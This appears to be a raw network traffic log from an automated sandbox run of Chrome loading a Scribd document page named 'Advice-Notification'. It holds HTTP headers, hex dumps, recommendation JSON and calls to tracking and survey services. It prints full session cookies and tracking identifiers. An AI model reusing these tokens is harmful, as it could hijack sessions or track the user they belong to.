                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1366INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private, no-store
                                                                                                                                                                                                                                                                                                                                                                                        Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"228c1299651015a0eb09d29825236342"
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: _scribd_session=R2pNdWgyKzJ1UDVRQjdFRFlpbmNiNmZ5ai82Rmo5NCtac0ZUeFZWTThDczc0T2RtTzM0NDNJeUJDY2srOC8xQlRndm42SGEycU1iU3FlTGF2S2U3WlZ1UVB1SXkzZDFyL1dsTEFITTJ0cDdSYjFMekY1dzNxTlU3YkVxMW5vdjB1dE1jTVhOeVVRelc5dWgwaW5POGRsVE5zZXlNUmRiZXlPdTcxYTFITVlVcEQ3dzZjSTd0UlJPK25iLzRuc3RnR2Y0VkE4MklEQ2VvaGpmaldXbU1VWkI3akcxRTl5T3NieHBiWlNFbFNmZnZ1ZDljWkZodzlwRDRCY3ZlUnhqY21BTmZSRGRjNVd4SUZqRE9oeEZXU0JCaUlXRWVwaUJvQ1pYd290TDBsYVVsWDg2RjV3RFRVYkk3SldaZytXdEwtLWMvUWsvS2l3ZDkrUUVWZGFDNms0UFE9PQ%3D%3D--1f3c216a51cb0934572e8a64c48ece0a0071946b; domain=.scribd.com; path=/; expires=Mon, 06 Dec 2027 21:59:28 GMT; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 330
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: 8e5f190b7e98b87cf863e4d64bcc915af326cb1c4fc2b974a203f0f063e95815
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.323866
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890023-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC247INData Raw: 58 2d 54 69 6d 65 72 3a 20 53 31 37 33 33 35 32 32 33 36 39 2e 36 34 30 35 37 35 2c 56 53 30 2c 56 45 33 36 38 0d 0a 56 61 72 79 3a 20 58 2d 4c 61 6e 67 75 61 67 65 2d 4c 6f 63 61 6c 65 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 33 30 37 32 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: X-Timer: S1733522369.640575,VS0,VE368Vary: X-Language-Locale,Accept-EncodingStrict-Transport-Security: max-age=63072000; includeSubDomainsalt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC5INData Raw: 61 31 36 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a16
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 7b 22 76 69 65 77 70 6f 72 74 5f 62 6f 74 74 6f 6d 5f 72 65 63 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 7b 22 69 64 22 3a 33 32 32 30 31 31 33 39 31 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 55 48 56 76 67 36 74 64 62 75 68 56 49 4c 79 35 46 59 39 75 56 58 6b 3d 22 7d 2c 7b 22 69 64 22 3a 33 35 37 38 31 33 30 35 34 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 46 58 31 73 4c 35 4f 73 33 61 78 6d 50 7a 64 4c 4a 6c 4e 2f 4c 71 73 3d 22 7d 2c 7b 22 69 64 22 3a 33 33 35 38 30 38 37 34 36 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 52 6f 70 64 6d 33 66 67 38 44 44 71 70 71 7a 34 53 4c 4e 74 32 4d 59 3d 22 7d 2c 7b 22 69 64 22 3a 33 31 30 35 36 30 31 30 38 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 54 74 7a 4c 31 6e 44 42 63 71 76 48
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"viewport_bottom_recs":{"items":[{"id":322011391,"doc_uuid":"sbd/UHVvg6tdbuhVILy5FY9uVXk="},{"id":357813054,"doc_uuid":"sbd/FX1sL5Os3axmPzdLJlN/Lqs="},{"id":335808746,"doc_uuid":"sbd/Ropdm3fg8DDqpqz4SLNt2MY="},{"id":310560108,"doc_uuid":"sbd/TtzL1nDBcqvH
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1204INData Raw: 7a 55 35 44 43 36 2f 6d 6b 3d 22 7d 2c 7b 22 69 64 22 3a 31 36 33 36 34 36 30 35 34 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 58 4c 36 59 66 6a 46 30 31 72 5a 41 73 64 44 4d 48 6a 50 6a 78 30 77 3d 22 7d 2c 7b 22 69 64 22 3a 33 33 37 35 33 36 30 36 31 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 36 4e 66 43 5a 57 4a 78 32 4c 4b 47 4a 70 79 46 33 75 78 4b 32 43 63 3d 22 7d 2c 7b 22 69 64 22 3a 32 34 34 31 35 37 39 31 37 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 45 51 66 68 72 4b 45 30 2f 48 7a 59 39 70 35 72 6f 7a 32 4c 70 51 55 3d 22 7d 2c 7b 22 69 64 22 3a 31 36 33 35 37 39 30 35 36 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 4b 4b 6f 75 4a 57 6b 4e 62 4e 4e 53 46 35 31 49 45 43 79 35 6d 47 51 3d 22 7d 2c 7b 22 69 64 22 3a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: zU5DC6/mk="},{"id":163646054,"doc_uuid":"sbd/XL6YfjF01rZAsdDMHjPjx0w="},{"id":337536061,"doc_uuid":"sbd/6NfCZWJx2LKGJpyF3uxK2Cc="},{"id":244157917,"doc_uuid":"sbd/EQfhrKE0/HzY9p5roz2LpQU="},{"id":163579056,"doc_uuid":"sbd/KKouJWkNbNNSF51IECy5mGQ="},{"id":
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC6INData Raw: 33 66 66 61 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3ffa
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 39 33 33 39 33 37 38 39 2c 32 33 34 30 32 38 35 30 33 2c 32 32 34 33 36 39 38 30 36 2c 32 32 34 33 32 36 32 35 30 2c 33 37 38 30 34 35 37 38 33 2c 32 32 34 34 32 36 38 37 37 2c 32 32 34 32 35 32 31 37 38 2c 33 33 35 35 33 37 33 39 38 2c 31 38 32 35 35 33 31 34 31 2c 32 33 35 34 31 31 37 36 37 2c 34 31 39 39 33 30 35 34 31 2c 31 36 33 36 34 36 30 35 34 2c 33 33 37 35 33 36 30 36 31 2c 32 34 34 31 35 37 39 31 37 2c 31 36 33 35 37 39 30 35 36 2c 31 36 33 36 35 37 31 36 36 2c 32 32 34 34 31 30 32 39 35 2c 33 31 36 33 39 31 32 33 32 2c 32 32 35 39 31 36 34 38 36 2c 31 38 32 35 36 30 32 38 33 2c 33 38 37 38 32 36 39 38 35 2c 34 32 33 33 38 37 34 36 32 2c 32 33 39 35 38 38 34 37 34 2c 32 32 34 34 31 39 30 32 33 2c 33 35 39 34 35 37 33 34 38 2c 32 32 34 34 32 30
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 93393789,234028503,224369806,224326250,378045783,224426877,224252178,335537398,182553141,235411767,419930541,163646054,337536061,244157917,163579056,163657166,224410295,316391232,225916486,182560283,387826985,423387462,239588474,224419023,359457348,224420
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 59 75 41 50 36 78 65 36 2f 51 6b 54 52 71 55 61 76 30 3d 22 7d 2c 7b 22 69 64 22 3a 32 32 34 33 32 36 32 35 30 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 77 4d 6f 56 4f 4b 41 69 43 6a 46 45 2f 5a 48 31 75 48 6c 33 51 6e 6f 3d 22 7d 2c 7b 22 69 64 22 3a 33 37 38 30 34 35 37 38 33 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 6a 6e 32 57 70 41 71 37 59 77 59 6b 36 77 66 4c 43 72 4b 6b 67 56 4d 3d 22 7d 2c 7b 22 69 64 22 3a 32 32 34 34 32 36 38 37 37 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 49 32 39 69 79 6e 50 58 6e 50 4b 73 4e 5a 48 66 74 78 34 70 59 57 6b 3d 22 7d 2c 7b 22 69 64 22 3a 32 32 34 32 35 32 31 37 38 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 51 38 50 6d 44 2f 62 43 55 4a 5a 54 78 58 4a 57 52 38 35 48 53 4f 77 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: YuAP6xe6/QkTRqUav0="},{"id":224326250,"doc_uuid":"sbd/wMoVOKAiCjFE/ZH1uHl3Qno="},{"id":378045783,"doc_uuid":"sbd/jn2WpAq7YwYk6wfLCrKkgVM="},{"id":224426877,"doc_uuid":"sbd/I29iynPXnPKsNZHftx4pYWk="},{"id":224252178,"doc_uuid":"sbd/Q8PmD/bCUJZTxXJWR85HSOw=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 2c 7b 22 69 64 22 3a 32 31 32 38 36 33 37 33 38 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 48 79 54 4d 41 44 79 4a 7a 33 6e 71 51 30 77 61 39 65 55 4f 75 69 45 3d 22 7d 2c 7b 22 69 64 22 3a 32 32 34 33 30 36 36 31 39 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 67 6e 41 70 72 76 42 57 5a 57 64 34 65 6f 62 44 6c 76 79 52 43 49 41 3d 22 7d 2c 7b 22 69 64 22 3a 32 32 34 37 35 36 37 30 36 2c 22 64 6f 63 5f 75 75 69 64 22 3a 22 73 62 64 2f 4e 4a 76 63 49 30 71 54 72 48 45 4a 37 56 64 56 49 4d 68 50 4d 69 6f 3d 22 7d 5d 2c 22 69 64 73 22 3a 5b 33 32 32 30 31 31 33 39 31 2c 33 35 37 38 31 33 30 35 34 2c 33 33 35 38 30 38 37 34 36 2c 33 31 30 35 36 30 31 30 38 2c 32 32 34 34 31 30 34 30 36 2c 33 35 36 30 33 32 31 35 31 2c 33 32 32 30 31 31 33 39 32
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,{"id":212863738,"doc_uuid":"sbd/HyTMADyJz3nqQ0wa9eUOuiE="},{"id":224306619,"doc_uuid":"sbd/gnAprvBWZWd4eobDlvyRCIA="},{"id":224756706,"doc_uuid":"sbd/NJvcI0qTrHEJ7VdVIMhPMio="}],"ids":[322011391,357813054,335808746,310560108,224410406,356032151,322011392
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1378INData Raw: 61 5f 74 68 75 6d 62 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6d 67 76 32 2d 32 2d 66 2e 73 63 72 69 62 64 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 67 2f 77 6f 72 64 5f 64 6f 63 75 6d 65 6e 74 2f 33 32 32 30 31 31 33 39 31 2f 32 39 38 78 33 39 36 2f 35 39 64 33 62 39 37 38 65 61 2f 31 37 33 33 33 34 34 34 37 35 3f 76 3d 31 22 2c 22 72 75 6e 5f 74 69 6d 65 22 3a 30 2c 22 73 68 6f 72 74 5f 74 69 74 6c 65 22 3a 22 54 68 65 20 53 75 62 74 6c 65 20 41 72 74 20 6f 66 20 4e 6f 74 20 47 69 76 69 6e 67 20 61 20 46 2a 63 6b 22 2c 22 73 74 61 74 69 63 5f 72 61 74 69 6e 67 22 3a 7b 22 72 61 74 69 6e 67 22 3a 34 2e 30 2c 22 63 6f 75 6e 74 22 3a 35 39 34 33 2c 22 75 70 5f 63 6f 75 6e 74 22 3a 34 31 39 31 7d 2c 22 74 68 75 6d 62 5f 75 72 6c 22 3a 22 68 74 74 70 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a_thumb_url":"https://imgv2-2-f.scribdassets.com/img/word_document/322011391/298x396/59d3b978ea/1733344475?v=1","run_time":0,"short_title":"The Subtle Art of Not Giving a F*ck","static_rating":{"rating":4.0,"count":5943,"up_count":4191},"thumb_url":"https


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        46192.168.2.164976252.73.207.1344436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC831OUTGET /s/c/a-05td?duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&euns=0&pt=500&s=&us_privacy=1-N-&version=v3.5.0&cd=.scribd.com&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: i.liadm.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1320
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        trace-id: b73b3f72e72b1bb4
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: _li_ss=CjcKBQgKEMMZCgYI3QEQwxkKBgilARDDGQoGCOEBEMMZCgYIgQEQwxkKBgiiARDDGQoGCNIBEMMZ; Max-Age=2592000; Expires=Sun, 05 Jan 2025 21:59:28 GMT; SameSite=None; Path=/s; Secure
                                                                                                                                                                                                                                                                                                                                                                                        Request-Time: 16
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private, no-cache, max-age=0
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1320INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 20 26 26 20 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 20 26 26 20 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 22 5f 6c 69 5f 73 73 3d 43 6a 63 4b 42 51 67 4b 45 4d 4d 5a 43 67 59 49 33 51 45 51 77 78 6b 4b 42 67 69 6c 41 52 44 44 47 51 6f 47 43 4f 45 42 45 4d 4d 5a 43 67 59 49 67 51 45 51 77 78 6b 4b 42 67 69 69 41 52 44 44 47 51 6f 47 43 4e 49 42 45 4d 4d 5a 22 2c 22 2a 22 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 69 76 65 2e 72 65 7a 79 6e 63 2e 63 6f 6d 2f 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><body><script type="text/javascript">window.parent && window.parent.postMessage && window.parent.postMessage("_li_ss=CjcKBQgKEMMZCgYI3QEQwxkKBgilARDDGQoGCOEBEMMZCgYIgQEQwxkKBgiiARDDGQoGCNIBEMMZ","*");</script><img src="https://live.rezync.com/s


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        47192.168.2.164976644.221.168.2244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1474OUTGET /j?dtstmp=1733522365790&aid=a-05td&se=e30&duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&tv=v3.5.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&us_privacy=1-N-&wpn=lc-bundle&wpv=v3.5.0&cd=.scribd.com&c=PHRpdGxlPkFkdmljZSBOb3RpZmljYXRpb24gfCBQREY8L3RpdGxlPjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJBZHZpY2UgTm90aWZpY2F0aW9uIC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgdmlldyBwcmVzZW50YXRpb24gc2xpZGVzIG9ubGluZS4gQWR2aWNlIE5vdGlmaWNhdGlvbiI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODAxNTE5MjkxL0FkdmljZS1Ob3RpZmljYXRpb24iPjx0aXRsZSBpZD0iNmEzMGQ0MDktNGUyNi00ODQyLWFkNzEtYjFhZDA4ZDE5MzczIj48IS0tLS0-Q2xvc2UgdGhpcyBkaWFsb2c8IS0tLS0-PC90aXRsZT48dGl0bGUgaWQ9ImNkMjJlYmIwLTc2ZTctNDkxOS04OGUzLTViMmE2MWM1MDM4OCI-PCEtLS0tPkNsb3NlIENvb2tpZSBQcmVmZXJlbmNlczwhLS0tLT48L3RpdGxlPg&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: rp.liadm.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1412INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        set-cookie: lidid=5dc74bfb-52cb-4a49-aaab-46842de7fa2a; Max-Age=63072000; Expires=Sun, 06 Dec 2026 21:59:28 GMT; Path=/; Domain=.liadm.com; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                        location: /j?dtstmp=1733522365790&aid=a-05td&se=e30&duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&tv=v3.5.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&us_privacy=1-N-&wpn=lc-bundle&wpv=v3.5.0&cd=.scribd.com&c=PHRpdGxlPkFkdmljZSBOb3RpZmljYXRpb24gfCBQREY8L3RpdGxlPjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJBZHZpY2UgTm90aWZpY2F0aW9uIC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgdmlldyBwcmVzZW50YXRpb24gc2xpZGVzIG9ubGluZS4gQWR2aWNlIE5vdGlmaWNhdGlvbiI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODAxNTE5MjkxL0FkdmljZS1Ob3RpZmljYXRpb24iPjx0aXRsZSBpZD0iNmEzMGQ0MDktNGUyNi00ODQyLWFkNzEtYjFhZDA4ZDE5MzczIj48IS0tLS0-Q2xvc2UgdGhpcyBkaWFsb2c8IS0tLS0-PC90aXRsZT48dGl0bGUgaWQ9ImNkMjJlYmIwLTc2ZTctNDkxOS04OGUzLTViMmE2MWM1MDM4OCI-PCEtLS0tPkNsb3NlIENvb2tpZSBQcmVmZXJlbmNlczwhLS0tLT48L3RpdGxlPg&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4&n3pc=true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-methods: GET
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-expose-headers: *
                                                                                                                                                                                                                                                                                                                                                                                        access-control-max-age: 86400


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        48192.168.2.164976989.35.237.1704436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC402OUTGET /workspaces/7de87bc73aff1974945059e230fb953d/web_surveys.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: survey.survicate.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:29 UTC1881INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        Server: BunnyCDN-RI1-892
                                                                                                                                                                                                                                                                                                                                                                                        CDN-PullZone: 1158558
                                                                                                                                                                                                                                                                                                                                                                                        CDN-Uid: 039640c0-4b09-428d-a0ae-513ccdd44502
                                                                                                                                                                                                                                                                                                                                                                                        CDN-RequestCountryCode: US
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
